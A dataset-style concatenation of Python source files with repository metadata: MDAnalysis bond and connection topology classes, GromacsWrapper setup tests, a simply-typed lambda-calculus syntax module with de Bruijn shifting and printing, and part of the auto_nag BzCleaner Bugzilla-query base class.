        try:
            unique_bonds = set(itertools.chain(
                *[self._bondDict[a] for a in ag.ix]))
        except TypeError:
            # maybe we got passed an Atom
            unique_bonds = self._bondDict[ag.ix]
        # NOTE(review): with no matching connections this is a 1-D empty
        # array and np.hsplit below fails -- TODO confirm callers guarantee
        # a non-empty selection.
        unique_bonds = np.array(sorted(unique_bonds), dtype=object)
        bond_idx, types, guessed, order = np.hsplit(unique_bonds, 4)
        bond_idx = np.array(bond_idx.ravel().tolist(), dtype=np.int32)
        types = types.ravel()
        guessed = guessed.ravel()
        order = order.ravel()
        return TopologyGroup(bond_idx, ag.universe,
                             self.singular[:-1],
                             types,
                             guessed,
                             order)

    @_check_connection_values
    def _add_bonds(self, values, types=None, guessed=True, order=None):
        """Append new connections, skipping those already present."""
        if types is None:
            types = itertools.cycle((None,))
        if guessed in (True, False):
            guessed = itertools.cycle((guessed,))
        if order is None:
            order = itertools.cycle((None,))
        existing = set(self.values)
        for v, t, g, o in zip(values, types, guessed, order):
            if v not in existing:
                self.values.append(v)
                self.types.append(t)
                self._guessed.append(g)
                self.order.append(o)
        # kill the old cache of bond Dict
        try:
            del self._cache['bd']
        except KeyError:
            pass

    @_check_connection_values
    def _delete_bonds(self, values):
        """Remove the given connections; all must exist.

        .. versionadded:: 1.0.0
        """
        to_check = set(values)
        self_values = set(self.values)
        if not to_check.issubset(self_values):
            missing = to_check - self_values
            indices = ', '.join(map(str, missing))
            raise ValueError(('Cannot delete nonexistent '
                              '{attrname} with atom indices:'
                              '{indices}').format(attrname=self.attrname,
                                                  indices=indices))
        # delete from the end so earlier indices stay valid
        idx = [self.values.index(v) for v in to_check]
        for i in sorted(idx, reverse=True):
            del self.values[i]

        # keep the parallel metadata lists in sync
        for attr in ('types', '_guessed', 'order'):
            arr = np.array(getattr(self, attr), dtype='object')
            new = np.delete(arr, idx)
            setattr(self, attr, list(new))
        # kill the old cache of bond Dict
        try:
            del self._cache['bd']
        except KeyError:
            pass
class Bonds(_Connection):
    """Bonds between two atoms
    Must be initialised by a list of zero based tuples.
    These indices refer to the atom indices.
    E.g., ` [(0, 1), (1, 2), (2, 3)]`
    Also adds the `bonded_atoms`, `fragment` and `fragments`
    attributes.
    """
    attrname = 'bonds'
    # Singular is the same because one Atom might have
    # many bonds, so still asks for "bonds" in the plural
    singular = 'bonds'
    transplants = defaultdict(list)
    _n_atoms = 2
    # NOTE: the functions below are written against `self` being an Atom
    # or AtomGroup, not a Bonds instance -- they are "transplanted" onto
    # those classes as read-only properties via the transplants dict.
    def bonded_atoms(self):
        """An :class:`~MDAnalysis.core.groups.AtomGroup` of all
        :class:`Atoms<MDAnalysis.core.groups.Atom>` bonded to this
        :class:`~MDAnalysis.core.groups.Atom`."""
        idx = [b.partner(self).index for b in self.bonds]
        return self.universe.atoms[idx]
    transplants[Atom].append(
        ('bonded_atoms', property(bonded_atoms, None, None,
                                  bonded_atoms.__doc__)))
    def fragindex(self):
        """The index (ID) of the
        :class:`~MDAnalysis.core.topologyattrs.Bonds.fragment` this
        :class:`~MDAnalysis.core.groups.Atom` is part of.
        .. versionadded:: 0.20.0
        """
        return self.universe._fragdict[self.ix].ix
    @cached('fragindices', universe_validation=True)
    def fragindices(self):
        r"""The
        :class:`fragment indices<MDAnalysis.core.topologyattrs.Bonds.fragindex>`
        of all :class:`Atoms<MDAnalysis.core.groups.Atom>` in this
        :class:`~MDAnalysis.core.groups.AtomGroup`.
        A :class:`numpy.ndarray` with
        :attr:`~numpy.ndarray.shape`\ ``=(``\ :attr:`~AtomGroup.n_atoms`\ ``,)``
        and :attr:`~numpy.ndarray.dtype`\ ``=numpy.int64``.
        .. versionadded:: 0.20.0
        """
        fragdict = self.universe._fragdict
        return np.array([fragdict[aix].ix for aix in self.ix], dtype=np.intp)
    def fragment(self):
        """An :class:`~MDAnalysis.core.groups.AtomGroup` representing the
        fragment this :class:`~MDAnalysis.core.groups.Atom` is part of.
        A fragment is a
        :class:`group of atoms<MDAnalysis.core.groups.AtomGroup>` which are
        interconnected by :class:`~MDAnalysis.core.topologyattrs.Bonds`, i.e.,
        there exists a path along one
        or more :class:`~MDAnalysis.core.topologyattrs.Bonds` between any pair
        of :class:`Atoms<MDAnalysis.core.groups.Atom>`
        within a fragment. Thus, a fragment typically corresponds to a molecule.
        .. versionadded:: 0.9.0
        """
        return self.universe._fragdict[self.ix].fragment
    @cached('fragments', universe_validation=True)
    def fragments(self):
        """Read-only :class:`tuple` of
        :class:`fragments<MDAnalysis.core.topologyattrs.Bonds.fragment>`.
        Contains all fragments that
        any :class:`~MDAnalysis.core.groups.Atom` in this
        :class:`~MDAnalysis.core.groups.AtomGroup` is part of.
        A fragment is a
        :class:`group of atoms<MDAnalysis.core.groups.AtomGroup>` which are
        interconnected by :class:`~MDAnalysis.core.topologyattrs.Bonds`, i.e.,
        there exists a path along one
        or more :class:`~MDAnalysis.core.topologyattrs.Bonds` between any pair
        of :class:`Atoms<MDAnalysis.core.groups.Atom>`
        within a fragment. Thus, a fragment typically corresponds to a molecule.
        Note
        ----
        * The contents of the fragments may extend beyond the contents of this
          :class:`~MDAnalysis.core.groups.AtomGroup`.
        .. versionadded:: 0.9.0
        """
        fragdict = self.universe._fragdict
        # order fragments by the index of their first atom for stable output
        return tuple(sorted(set(fragdict[aix].fragment for aix in self.ix),
                            key=lambda x: x[0].ix))
    def n_fragments(self):
        """The number of unique
        :class:`~MDAnalysis.core.topologyattrs.Bonds.fragments` the
        :class:`Atoms<MDAnalysis.core.groups.Atom>` of this
        :class:`~MDAnalysis.core.groups.AtomGroup` are part of.
        .. versionadded:: 0.20.0
        """
        return len(unique_int_1d(self.fragindices))
    # wire the functions above onto Atom / AtomGroup as properties
    transplants[Atom].append(
        ('fragment', property(fragment, None, None,
                              fragment.__doc__)))
    transplants[Atom].append(
        ('fragindex', property(fragindex, None, None,
                               fragindex.__doc__)))
    transplants[AtomGroup].append(
        ('fragments', property(fragments, None, None,
                               fragments.__doc__)))
    transplants[AtomGroup].append(
        ('fragindices', property(fragindices, None, None,
                                 fragindices.__doc__)))
    transplants[AtomGroup].append(
        ('n_fragments', property(n_fragments, None, None,
                                 n_fragments.__doc__)))
class UreyBradleys(_Connection):
    """Angles between two atoms
    Initialise with a list of 2 long tuples
    These indices refer to the atom indices.
    .. versionadded:: 1.0.0
    """
    attrname = 'ureybradleys'
    singular = 'ureybradleys'
    transplants = defaultdict(list)
    # two atom indices per connection entry
    _n_atoms = 2
class Angles(_Connection):
    """Angles between three atoms
    Initialise with a list of 3 long tuples
    E.g., `[(0, 1, 2), (1, 2, 3), (2, 3, 4)]`
    These indices refer to the atom indices.
    """
    attrname = 'angles'
    singular = 'angles'
    transplants = defaultdict(list)
    # three atom indices per connection entry
    _n_atoms = 3
class Dihedrals(_Connection):
    """A connection between four sequential atoms"""
    attrname = 'dihedrals'
    singular = 'dihedrals'
    transplants = defaultdict(list)
    # four atom indices per connection entry
    _n_atoms = 4
class Impropers(_Connection):
    """An imaginary dihedral between four atoms"""
    attrname = 'impropers'
    singular = 'impropers'
    transplants = defaultdict(list)
    # four atom indices per connection entry
    _n_atoms = 4
class CMaps(_Connection):
    """
    A connection between five atoms
    .. versionadded:: 1.0.0
    """
    attrname = 'cmaps'
    singular = 'cmaps'
    transplants = defaultdict(list)
    # five atom indices per connection entry
    _n_atoms = 5
|
MDAnalysis/mdanalysis
|
package/MDAnalysis/core/topologyattrs.py
|
Python
|
gpl-2.0
| 90,931
|
[
"Amber",
"MDAnalysis"
] |
ba50a17f11acd5da5bfdf798e190087a9cc230dd8932940f68f08ce8e8828f73
|
# GromacsWrapper: test_example.py
# Copyright (c) 2009 Oliver Beckstein <orbeckst@gmail.com>
# Released under the GNU Public License 3 (or higher, your choice)
# See the file COPYING for details.
from __future__ import division, absolute_import, print_function
import os.path
import pytest
from numpy.testing import assert_almost_equal
import gromacs
import gromacs.setup
from .datafiles import datafile
@pytest.mark.xfail(gromacs.release.startswith("2020.6"),
                   reason="pdb2gmx 2020.6 fails to build the TIP4P waters")
def test_trj_compact_main(tmpdir):
    """Build a topology and TPR for 1AKE, then write a compacted PDB."""
    pdb = datafile("1ake_A.pdb")
    workdir = tmpdir.mkdir("top")
    mdp_name = "simple.mdp"
    tpr_name = "simple.tpr"
    compact_name = "compact.pdb"
    with workdir.as_cwd():
        topol = gromacs.setup.topology(struct=pdb, ff="oplsaa", water="tip4p")
        with open(mdp_name, 'w') as fh:
            fh.write('; empty mdp file\nrcoulomb = 1\nrvdw = 1\nrlist = 1\n')
        gromacs.grompp(f=mdp_name, o=tpr_name, c=topol["struct"], p=topol["top"])
        gromacs.setup.trj_compact_main(s=tpr_name, f=topol["struct"],
                                       o=compact_name,
                                       input=("protein", "system"))
        assert os.path.exists(compact_name)
@pytest.fixture(scope="session")
def topology(tmpdir_factory, struct=datafile("1ake_A_protein.pdb")):
    """Session-scoped GROMACS topology for the 1AKE protein.

    Uses the protein-only input 1ake_A_protein.pdb because solvation
    fails if crystal waters are included (as in 1ake_A.pdb).
    """
    workdir = tmpdir_factory.mktemp('1ake')
    with workdir.as_cwd():
        args = gromacs.setup.topology(struct=struct, ff="oplsaa",
                                      water="tip4p")
    return workdir, args
@pytest.fixture(scope="session")
def solvate(topology):
    """Solvate the session topology and add 0.15 M ions."""
    workdir, topol_args = topology
    with workdir.as_cwd():
        args = gromacs.setup.solvate(concentration=0.15, water="tip4p",
                                     **topol_args)
    return workdir, args
@pytest.fixture(scope="session")
def energy_minimize(solvate, low_performance):
    """Run a short, cheap steepest-descent minimization of the system."""
    workdir, solvate_args = solvate
    # cap the thread count on weak CI boxes; 0 lets mdrun choose
    threads = 2 if low_performance else 0
    with workdir.as_cwd():
        args = gromacs.setup.energy_minimize(mdrun_args={'nt': threads},
                                             integrator="steep",
                                             emtol=5000,
                                             maxwarn=1,
                                             **solvate_args)
    return workdir, args
def test_topology(topology):
    """Topology generation must produce the top, struct and posres files."""
    _, topol_args = topology
    for key in ("top", "struct", "posres"):
        assert os.path.exists(topol_args[key])
    # TODO: add more tests for content of files!
def test_solvate(solvate):
    """Solvated system must be charge-neutral with struct/ndx files present."""
    _, solvate_args = solvate
    assert_almost_equal(solvate_args['qtot'], 0.0)
    for key in ('struct', 'ndx'):
        assert os.path.exists(solvate_args[key])
    assert solvate_args['mainselection'] == '"Protein"'
    # TODO: add more tests for content of files!
def test_energy_minimize(energy_minimize):
    """Minimization must keep struct/top files and the Protein selection."""
    _, em_args = energy_minimize
    for key in ('struct', 'top'):
        assert os.path.exists(em_args[key])
    assert em_args['mainselection'] == '"Protein"'
    # TODO: add more tests for content of files!
def test_energy_minimize_custom_mdp(solvate, low_performance,
                                    mdp=datafile("custom_em.mdp")):
    """Energy minimization driven by a user-supplied mdp file."""
    workdir, solvate_args = solvate
    threads = 2 if low_performance else 0
    with workdir.as_cwd():
        try:
            em_args = gromacs.setup.energy_minimize(mdrun_args={'nt': threads},
                                                    mdp=mdp,
                                                    emtol=5000,
                                                    **solvate_args)
        except gromacs.exceptions.GromacsError:
            # sometimes the em does not converge at all, e.g. 5.02988e+04 on atom 3277;
            # (happens on Travis Linux with Gromacs 4.6.5 but not locally or on Travis OSX) so we
            # re-run with a ridiculous tolerance so that we can at least test that the whole
            # function can run to completion
            em_args = gromacs.setup.energy_minimize(mdrun_args={'nt': threads},
                                                    mdp=mdp,
                                                    emtol=6e4,
                                                    **solvate_args)
    for key in ('struct', 'top'):
        assert os.path.exists(em_args[key])
    assert em_args['mainselection'] == '"Protein"'
    # TODO: add more tests for content of files!
|
Becksteinlab/GromacsWrapper
|
tests/test_setup.py
|
Python
|
gpl-3.0
| 4,756
|
[
"CRYSTAL",
"Gromacs"
] |
f1976cebd74c225a5d32c4b322cc12372fdad94992a8409f0eb574e4d424600d
|
from collections import namedtuple
# ----------------------------------------------------------------------
# Datatypes
# Types
# TyTop/TyBot print as "Top"/"Bot" (see TypesPrinter below); TyRecord
# holds a list of (label, type) fields; TyArr is a function type.
TyTop = namedtuple("TyTop", [])
TyBot = namedtuple("TyBot", [])
TyRecord = namedtuple("TyRecord", ["fields"])
TyArr = namedtuple("TyArr", ["left", "right"])
# Terms
# TmVar carries a de Bruijn index plus the context length it was built
# against (used as a consistency check when printing).
TmVar = namedtuple("TmVar", ["info", "index", "ctxlength"])
TmAbs = namedtuple("TmAbs", ["info", "name", "type", "term"])
TmApp = namedtuple("TmApp", ["info", "left", "right"])
TmRecord = namedtuple("TmRecord", ["info", "fields"])
TmProj = namedtuple("TmProj", ["info", "term", "name"])
# Bindings
# NameBind: bare name; VarBind: name with a recorded type.
NameBind = namedtuple("NameBind", [])
VarBind = namedtuple("VarBind", ["type"])
# Commands
Bind = namedtuple("Bind", ["info", "name", "binding"])
Eval = namedtuple("Eval", ["info", "term"])
# ----------------------------------------------------------------------
# Context management
def addbinding(ctx, name, bind):
    """Append the (name, bind) pair to *ctx* in place and return it."""
    ctx += [(name, bind)]
    return ctx
def addname(ctx, name):
    """Extend *ctx* in place with an untyped (NameBind) binding for *name*."""
    ctx.append((name, NameBind()))
    return ctx
def isnamebound(ctx, name):
    """Return True if *name* is already bound somewhere in the context."""
    return any(bound == name for bound, _ in ctx)
def pickfreshname(ctx, name):
    """Return (new_ctx, fresh) where *fresh* is *name* with primes
    appended until it is unbound, and *new_ctx* is a copy of *ctx*
    extended with a NameBind for it."""
    fresh = str(name)
    while isnamebound(ctx, fresh):
        fresh = fresh + "'"
    return ctx + [(fresh, NameBind())], fresh
def get_ctx_item(ctx, index):
    """Return the (name, binding) pair at de Bruijn *index* (0 = innermost).

    Raises RuntimeError for any out-of-range index.  The previous
    try/except-IndexError implementation let ``len(ctx) <= index <
    2*len(ctx)`` slip through: ``ctx[len(ctx) - index - 1]`` became a
    negative Python index and silently wrapped around to the wrong
    binding instead of failing.
    """
    pos = len(ctx) - index - 1
    if not 0 <= pos < len(ctx):
        raise RuntimeError(
            "Variable lookup failure: offset: %d, ctx size: %d" %
            (index, len(ctx)))
    return ctx[pos]
def index2name(ctx, index):
    """Name of the variable bound at de Bruijn *index*."""
    return get_ctx_item(ctx, index)[0]
def name2index(ctx, name):
    """De Bruijn index of the innermost binding of *name*."""
    for pos in range(len(ctx) - 1, -1, -1):
        if ctx[pos][0] == name:
            return len(ctx) - 1 - pos
    raise ValueError("Identifier %s is unbound" % name)
# ----------------------------------------------------------------------
# Shifting
def tmmap(onvar, c, t):
    """Structurally map *onvar* over every TmVar in term *t*.

    ``onvar(info, c, index, ctxlength)`` is called for each variable,
    where ``c`` counts the binders crossed so far (starting from the
    given cutoff).  All other node kinds are rebuilt unchanged.
    """
    def walk(c, t):
        ty_t = type(t)
        if ty_t is TmVar:
            return onvar(t.info, c, t.index, t.ctxlength)
        elif ty_t is TmAbs:
            # entering a binder: one more variable in scope below it
            return TmAbs(t.info, t.name, t.type, walk((c+1), t.term))
        elif ty_t is TmApp:
            return TmApp(t.info, walk(c, t.left), walk(c, t.right))
        elif ty_t is TmProj:
            return TmProj(t.info, walk(c, t.term), t.name)
        elif ty_t is TmRecord:
            fields = [(li, walk(c, ti)) for li, ti in t.fields]
            return TmRecord(t.info, fields)
        # NOTE(review): any other node kind silently falls through and
        # yields None -- presumably all term constructors are covered.
    return walk(c, t)
def termShiftAbove(d, c, t):
    """Shift free-variable indices in *t* by *d*, leaving indices below
    cutoff *c* (bound variables) untouched; ctxlength always grows by d."""
    def shift_var(info, cutoff, x, n):
        if x >= cutoff:
            return TmVar(info, x + d, n + d)
        return TmVar(info, x, n + d)
    return tmmap(shift_var, c, t)
def termShift(d, t):
    """Shift every free variable in *t* by *d* (cutoff 0)."""
    return termShiftAbove(d, 0, t)
# ----------------------------------------------------------------------
# Substitution
def termSubst(j, s, t):
    """Substitute term *s* for variable *j* in *t* ([j -> s] t)."""
    def on_var(info, c, x, n):
        if x == j + c:
            # shift s by the number of binders crossed to reach this spot
            return termShift(c, s)
        return TmVar(info, x, n)
    return tmmap(on_var, 0, t)
def termSubstTop(s, t):
    """Beta-reduction helper: substitute *s* for index 0 and shift down."""
    substituted = termSubst(0, termShift(1, s), t)
    return termShift(-1, substituted)
# ----------------------------------------------------------------------
# Context management (continued)
def getbinding(ctx, index):
    """Binding stored at de Bruijn *index*."""
    return get_ctx_item(ctx, index)[1]
def getTypeFromContext(ctx, index):
    """Return the type recorded for the variable at *index*.

    Raises RuntimeError when the binding is a bare NameBind (or anything
    other than a VarBind), since those carry no type information.

    The original body ended with an unreachable bare ``raise`` after an
    if/else in which both branches already return or raise; it has been
    removed.
    """
    binding = getbinding(ctx, index)
    if isinstance(binding, VarBind):
        return binding.type
    raise RuntimeError(
        "Wrong kind of binding for variable %s" %
        index2name(ctx, index))
# ----------------------------------------------------------------------
# Printing
class Info(namedtuple("Info", ["filename", "lineno"])):
    """Source location (filename, lineno) used in diagnostics."""

    def __repr__(self):
        return "<{0}:{1}>".format(self.filename, self.lineno)
class Visitor:
    """Dispatch ``visit(term)`` to a ``visit_<TypeName>`` handler defined
    on the subclass; a ``visit__`` attribute acts as a catch-all."""

    @classmethod
    def visit(cls, term, *args, **kwargs):
        handler_name = 'visit_' + type(term).__name__
        fallback = getattr(cls, 'visit__', None)
        handler = getattr(cls, handler_name, fallback)
        if handler is None:
            raise AttributeError(
                "type object '%s' has no attribute '%s'" %
                (cls.__name__, handler_name))
        return handler(term, *args, **kwargs)
class TypesPrinter(Visitor):
    # Writes a type to stdout.  Handlers take the type node as their
    # first argument (there is no printer instance: Visitor.visit looks
    # the plain functions up on the class and calls them directly).
    # No parentheses are emitted around nested arrow types.
    def visit_TyArr(term):
        printty(term.left)
        print(" -> ", end="")
        printty(term.right)
    # NOTE(review): no TyBool type is defined in this module's
    # datatypes; this handler looks carried over from another chapter.
    def visit_TyBool(term):
        print("Bool", end="")
    def visit_TyTop(term):
        print("Top", end="")
    def visit_TyBot(term):
        print("Bot", end="")
# convenience alias: printty(ty) dispatches through the visitor
printty = TypesPrinter.visit
class TermsPrinter(Visitor):
    # Writes a term to stdout.  Despite the 'self' parameter name, each
    # handler receives the *term node* as its first argument (see
    # Visitor.visit), plus the naming context.
    def visit_TmVar(self, ctx):
        # ctxlength acts as a consistency check against the live context
        if len(ctx) == self.ctxlength:
            print(index2name(ctx, self.index), end="")
        else:
            print(
                "[bad index: " + str(self.index) + "/" + str(self.ctxlength)
                + " in {" + " ".join(map(str, ctx)) + " }]")
    def visit_TmAbs(self, ctx):
        # rename the bound variable if its name is already taken
        (new_ctx, name) = pickfreshname(ctx, self.name)
        print("(", end="")
        print("lambda %s" % name, end="")
        print(": ", end="")
        printty(self.type)
        print(" . ", end="")
        printtm(self.term, new_ctx)
        print(")", end="")
    def visit_TmApp(self, ctx):
        print("(", end="")
        printtm(self.left, ctx)
        print(" ", end="")
        printtm(self.right, ctx)
        print(")", end="")
    # NOTE(review): TmTrue/TmFalse/TmIf are not defined in this module's
    # datatypes, and visit_TmIf looks truncated: it never prints the
    # else-branch term and calls printtm without a ctx argument.
    # Confirm against the upstream chapter before relying on these.
    def visit_TmTrue(self, ctx):
        print("true", end="")
    def visit_TmFalse(self, ctx):
        print("false", end="")
    def visit_TmIf(self):
        print("if", end="")
        printtm(self.term_condition)
        print(" then ", end="")
        printtm(self.term_then)
        print(" else")
# convenience alias: printtm(term, ctx) dispatches through the visitor
printtm = TermsPrinter.visit
|
habibutsu/tapl-py
|
rcdsubbot/syntax.py
|
Python
|
mit
| 5,635
|
[
"VisIt"
] |
303e01c31e90b6d68255357a85c9eea18025c197c28fc4ae9ed8df3230341ac9
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import inspect
import os
import time
import six
from dateutil.relativedelta import relativedelta
from jinja2 import Environment, FileSystemLoader
from libmozdata import utils as lmdutils
from libmozdata.bugzilla import Bugzilla
from auto_nag import db, logger, mail, utils
from auto_nag.cache import Cache
from auto_nag.nag_me import Nag
class BzCleaner(object):
    """Base class for auto_nag tools: runs a Bugzilla query, optionally
    autofixes bugs, renders an HTML report and emails it."""
    def __init__(self):
        super(BzCleaner, self).__init__()
        # derive the tool name/path from the subclass' source file
        self._set_tool_name()
        self.has_autofix = False
        self.no_manager = set()
        self.auto_needinfo = {}
        self.has_flags = False
        self.cache = Cache(self.name(), self.max_days_in_cache())
        self.test_mode = utils.get_config("common", "test", False)
        self.versions = None
        logger.info("Run tool {}".format(self.get_tool_path()))
    def _is_a_bzcleaner_init(self, info):
        """True if the given stack frame is an __init__ of a BzCleaner."""
        if info[3] == "__init__":
            frame = info[0]
            args = inspect.getargvalues(frame)
            if "self" in args.locals:
                zelf = args.locals["self"]
                return isinstance(zelf, BzCleaner)
        return False
    def _set_tool_name(self):
        """Set __tool_name__/__tool_path__ from the outermost subclass
        __init__ found on the call stack (i.e. the script being run)."""
        stack = inspect.stack()
        init = [s for s in stack if self._is_a_bzcleaner_init(s)]
        # the last matching frame is the most-derived subclass __init__
        last = init[-1]
        info = inspect.getframeinfo(last[0])
        base = os.path.dirname(__file__)
        scripts = os.path.join(base, "scripts")
        self.__tool_path__ = os.path.relpath(info.filename, scripts)
        name = os.path.basename(info.filename)
        name = os.path.splitext(name)[0]
        self.__tool_name__ = name
    def init_versions(self):
        """Fetch the checked Firefox versions; True if any were found."""
        self.versions = utils.get_checked_versions()
        return bool(self.versions)
    def max_days_in_cache(self):
        """Get the max number of days the data must be kept in cache"""
        return self.get_config("max_days_in_cache", -1)
    def preamble(self):
        """Optional HTML preamble for the report template."""
        return None
    def description(self):
        """Get the description for the help"""
        return ""
    def name(self):
        """Get the tool name"""
        return self.__tool_name__
    def get_tool_path(self):
        """Get the tool path"""
        return self.__tool_path__
    def needinfo_template(self):
        """Get the txt template filename"""
        return self.name() + "_needinfo.txt"
    def template(self):
        """Get the html template filename"""
        return self.name() + ".html"
    def subject(self):
        """Get the partial email subject"""
        return self.description()
    def get_email_subject(self, date):
        """Get the email subject with a date or not"""
        af = "[autofix]" if self.has_autofix else ""
        if date:
            return "[autonag]{} {} for the {}".format(af, self.subject(), date)
        return "[autonag]{} {}".format(af, self.subject())
    def ignore_date(self):
        """Should we ignore the date ?"""
        return False
    def must_run(self, date):
        """Check if the tool must run for this date"""
        return True
    def has_enough_data(self):
        """Check if the tool has enough data to run"""
        if self.versions is None:
            # init_versions() has never been called
            return True
        return bool(self.versions)
    def filter_no_nag_keyword(self):
        """If True, then remove the bugs with [no-nag] in whiteboard from the bug list"""
        return True
    def add_no_manager(self, bugid):
        """Record a bug whose assignee has no manager (used by templates)."""
        self.no_manager.add(str(bugid))
    def has_assignee(self):
        """Whether the report should include the assignee column."""
        return False
    def has_needinfo(self):
        """Whether the report should include needinfo requestees."""
        return False
    def get_mail_to_auto_ni(self, bug):
        """Return {'mail': ..., 'nickname': ...} to auto-needinfo, or None."""
        return None
    def all_include_fields(self):
        """If True, don't amend include_fields (the query asks for all)."""
        return False
    def get_max_ni(self):
        """Max needinfos per person (<= 0 means unlimited)."""
        return -1
    def ignore_meta(self):
        """If True, exclude bugs with the 'meta' keyword."""
        return False
    def columns(self):
        """The fields to get for the columns in email report"""
        return ["id", "summary"]
    def sort_columns(self):
        """Returns the key to sort columns"""
        return None
    def get_dates(self, date):
        """Get the dates for the bugzilla query (changedafter and changedbefore fields)"""
        date = lmdutils.get_date_ymd(date)
        lookup = self.get_config("days_lookup", 7)
        start_date = date - relativedelta(days=lookup)
        end_date = date + relativedelta(days=1)
        return start_date, end_date
    def get_extra_for_template(self):
        """Get extra data to put in the template"""
        return {}
    def get_extra_for_needinfo_template(self):
        """Get extra data to put in the needinfo template"""
        return {}
    def get_config(self, entry, default=None):
        """Read a per-tool entry from the shared configuration."""
        return utils.get_config(self.name(), entry, default=default)
    def get_bz_params(self, date):
        """Get the Bugzilla parameters for the search query"""
        return {}
    def get_data(self):
        """Get the data structure to use in the bughandler"""
        return {}
    def get_summary(self, bug):
        """Summary for the report; hidden for confidential (grouped) bugs."""
        return "..." if bug["groups"] else bug["summary"]
    def has_default_products(self):
        """If True, restrict the query to the configured product list."""
        return True
    def has_product_component(self):
        """Whether the report should include product/component columns."""
        return False
    def get_product_component(self):
        # NOTE(review): self.prod_comp is not set in this class --
        # presumably subclasses that enable has_product_component set it.
        return self.prod_comp
    def get_max_years(self):
        """Max bug age in years to query (-1 means unlimited)."""
        return self.get_config("max-years", -1)
    def has_access_to_sec_bugs(self):
        """Whether this tool may see security (grouped) bugs."""
        return self.get_config("sec", True)
    def handle_bug(self, bug, data):
        """Implement this function to get all the bugs from the query"""
        return bug
    def get_db_extra(self):
        """Get extra information required for db insertion"""
        return {
            bugid: ni_mail
            for ni_mail, v in self.auto_needinfo.items()
            for bugid in v["bugids"]
        }
    def get_auto_ni_skiplist(self):
        """Emails that must never receive an automatic needinfo."""
        return set()
    def add_auto_ni(self, bugid, data):
        """Queue an automatic needinfo for *bugid*, honouring the
        per-person cap from get_max_ni() and the skiplist."""
        if not data:
            return
        ni_mail = data["mail"]
        if ni_mail in self.get_auto_ni_skiplist():
            return
        if ni_mail in self.auto_needinfo:
            max_ni = self.get_max_ni()
            info = self.auto_needinfo[ni_mail]
            if max_ni <= 0 or len(info["bugids"]) < max_ni:
                info["bugids"].append(str(bugid))
        else:
            self.auto_needinfo[ni_mail] = {
                "nickname": data["nickname"],
                "bugids": [str(bugid)],
            }
    def get_receivers(self):
        """Resolve the configured receivers (a named list or explicit)."""
        receivers = self.get_config("receivers")
        if isinstance(receivers, six.string_types):
            receivers = utils.get_config("common", "receiver_list", default={})[
                receivers
            ]
        return receivers
    def bughandler(self, bug, data):
        """bug handler for the Bugzilla query"""
        # skip bugs already processed in a previous run
        if bug["id"] in self.cache:
            return
        # a None return from handle_bug means "not interesting, drop it"
        if self.handle_bug(bug, data) is None:
            return
        bugid = str(bug["id"])
        res = {"id": bugid}
        auto_ni = self.get_mail_to_auto_ni(bug)
        self.add_auto_ni(bugid, auto_ni)
        res["summary"] = self.get_summary(bug)
        if self.has_assignee():
            real = bug["assigned_to_detail"]["real_name"]
            if utils.is_no_assignee(bug["assigned_to"]):
                real = "nobody"
            # fall back through name then email when real_name is blank
            if real.strip() == "":
                real = bug["assigned_to_detail"]["name"]
            if real.strip() == "":
                real = bug["assigned_to_detail"]["email"]
            res["assignee"] = real
        if self.has_needinfo():
            s = set()
            for flag in utils.get_needinfo(bug):
                s.add(flag["requestee"])
            res["needinfos"] = sorted(s)
        if self.has_product_component():
            for k in ["product", "component"]:
                res[k] = bug[k]
        if isinstance(self, Nag):
            bug = self.set_people_to_nag(bug, res)
            if not bug:
                return
        # merge with any data already recorded for this bug
        if bugid in data:
            data[bugid].update(res)
        else:
            data[bugid] = res
    def amend_bzparams(self, params, bug_ids):
        """Amend the Bugzilla params"""
        # normalise include_fields so that 'id', 'summary' and 'groups'
        # (plus any column-dependent fields) are always requested
        if not self.all_include_fields():
            if "include_fields" in params:
                fields = params["include_fields"]
                if isinstance(fields, list):
                    if "id" not in fields:
                        fields.append("id")
                elif isinstance(fields, six.string_types):
                    if fields != "id":
                        params["include_fields"] = [fields, "id"]
                else:
                    params["include_fields"] = [fields, "id"]
            else:
                params["include_fields"] = ["id"]
            params["include_fields"] += ["summary", "groups"]
            if self.has_assignee() and "assigned_to" not in params["include_fields"]:
                params["include_fields"].append("assigned_to")
            if self.has_product_component():
                if "product" not in params["include_fields"]:
                    params["include_fields"].append("product")
                if "component" not in params["include_fields"]:
                    params["include_fields"].append("component")
            if self.has_needinfo() and "flags" not in params["include_fields"]:
                params["include_fields"].append("flags")
        if bug_ids:
            params["bug_id"] = bug_ids
        # extra search criteria are appended as numbered f/o/v triples
        if self.filter_no_nag_keyword():
            n = utils.get_last_field_num(params)
            params.update(
                {
                    "f" + n: "status_whiteboard",
                    "o" + n: "notsubstring",
                    "v" + n: "[no-nag]",
                }
            )
        if self.ignore_meta():
            n = utils.get_last_field_num(params)
            params.update({"f" + n: "keywords", "o" + n: "nowords", "v" + n: "meta"})
        # Limit the checkers to X years. Unlimited if max_years = -1
        max_years = self.get_max_years()
        if max_years > 0:
            n = utils.get_last_field_num(params)
            params.update(
                {
                    f"f{n}": "creation_ts",
                    f"o{n}": "greaterthan",
                    f"v{n}": f"-{max_years}y",
                }
            )
        if self.has_default_products():
            params["product"] = self.get_config("products")
        if not self.has_access_to_sec_bugs():
            n = utils.get_last_field_num(params)
            params.update({"f" + n: "bug_group", "o" + n: "isempty"})
        # remember whether flags data will be available (see has_bot_set_ni)
        self.has_flags = "flags" in params.get("include_fields", [])
def get_bugs(self, date="today", bug_ids=[], chunk_size=None):
"""Get the bugs"""
bugs = self.get_data()
params = self.get_bz_params(date)
self.amend_bzparams(params, bug_ids)
self.query_url = utils.get_bz_search_url(params)
if isinstance(self, Nag):
self.query_params = params
old_CHUNK_SIZE = Bugzilla.BUGZILLA_CHUNK_SIZE
try:
if chunk_size:
Bugzilla.BUGZILLA_CHUNK_SIZE = chunk_size
Bugzilla(
params,
bughandler=self.bughandler,
bugdata=bugs,
timeout=self.get_config("bz_query_timeout"),
).get_data().wait()
finally:
Bugzilla.BUGZILLA_CHUNK_SIZE = old_CHUNK_SIZE
self.get_comments(bugs)
return bugs
    def commenthandler(self, bug, bugid, data):
        """Hook: subclasses process a bug's comments here."""
        return
    def _commenthandler(self, bug, bugid, data):
        """Internal comment handler: records the last-comment lag (when
        enabled) before delegating to the subclass commenthandler."""
        comments = bug["comments"]
        bugid = str(bugid)
        if self.has_last_comment_time():
            if comments:
                data[bugid]["last_comment"] = utils.get_human_lag(comments[-1]["time"])
            else:
                data[bugid]["last_comment"] = ""
